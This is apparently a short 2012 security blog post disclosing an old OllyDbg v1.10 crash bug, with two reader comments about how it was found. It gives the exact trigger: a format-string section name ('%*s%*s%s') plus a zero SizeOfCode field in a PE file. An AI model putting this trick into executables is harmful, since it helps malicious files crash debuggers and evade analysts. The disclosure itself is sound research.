Monday, March 19, 2012

OllyDbg Section Name Crash

This is an old yet interesting bug in OllyDbg. This bug affects OllyDbg v1.10 even with the "OllyAdvanced v1.27" option set.

Here is a screenshot of the vulnerable code.
In brief, set the name of the code section to "%*s%*s%s" and the "SizeOfCode" field to zero.

A demo can be found here.

You can follow me on Twitter @waleedassar 

2 comments:

  1. I came across the exact bug recently, and figured to remove the format-string section name, but how did you locate the bug?

    ReplyDelete
    Replies
    1. Just reversing the function responsible for parsing PE headers.

      Delete